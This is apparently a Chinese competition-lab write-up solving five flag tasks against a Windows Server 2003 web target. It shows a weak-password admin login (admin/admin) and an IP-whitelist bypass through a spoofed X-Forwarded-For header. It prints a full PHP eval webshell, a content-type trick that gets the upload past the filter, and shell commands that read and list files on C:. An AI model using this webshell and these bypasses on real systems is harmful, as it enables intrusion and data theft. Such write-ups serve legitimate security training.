任务环境说明:
服务器场景:match_win03-3-1
服务器场景操作系统:windows Server 2003
出环境,QQ:1968384113 网络建设与运维-网络安全讨论组:715170200
1.使用渗透机Kali Linux,登录靶机HTTP服务后台管理页面,并将后台管理页面代码中Flag值提交。
使用nmap扫描工具扫描靶机,查看端口开放情况
80端口是正常开放的,我们使用web网站目录爆破工具dirb扫描靶机,找到网站后台管理网址
访问后台网址后,使用弱口令账号密码登录:admin-admin
看到回显,我们的ip地址不在白名单中,所以我们要使用burpsuite工具修改IP地址,修改成本地ip
使用burpsuite拦截,然后添加X-Forwarded-For:127.0.0.1
这样我们就登录进去了,这题要我们将后台管理页面代码中Flag值提交,现在我们已经进入后台页面,查看源代码就可以找到flag
Flag:Oauth0
2.使用渗透机Kali Linux,访问靶机Http服务,使用文本反馈功能上传PHP一句话木马(shell.php),并将上传后提示唯一一行JavaScript代码作为Flag值提交。
访问http://靶机ip,点击问题反馈,再点击BUG反馈(文档方式)
进来之后是一个上传文档的地方,在这里上传一句话木马
在桌面创建一个shell.php文件,文件内容为<?php @eval($_GET["cmd"]);?>
将文件提交的时候使用burpsuite拦截,然后发送到重放器,在重放器发送之后,得到flag
Flag:window.open('upload/shell.php');
3.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马获取靶机C盘根目录下flag.txt中内容,并将获取文件函数作为Flag值提交。
在“代理”中,需要修改文件属性,不然上传不上去,靶机进制上传php文件,我们把php文件属性修改成text/plain的txt文件属性,再放行就上传成功了
上传成功后,访问http://靶机ip/upload/shell.php
下一步就是要利用这个木马,获取C盘目录下的flag文件
在shell.php后面添加?cmd=echo file_get_contents('c:\\flag.txt');
Flag:file_get_contents
4.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马获取靶机C盘根目录下flag.txt中的内容,并将文本中的内容作为Flag值提交。
根据上一题,Flag已经找到了
Flag:hel10wOrld
5.使用渗透机Kali Linux,访问靶机Http服务,通过一句话木马找到C盘根目录下唯一一个png文件,并提交图片源文件中的Flag值。
利用一句话木马,列出C盘根目录的文件。在shell.php后面添加?cmd=system('dir c:\\');
这样我们就知道C盘根目录下png图片的名称了,只需要使用type命令查看图片内容
在shell.php后面添加?cmd=system('type c:\\geforce0.png');
在底下找到flag
Flag:Ia98a8fA9a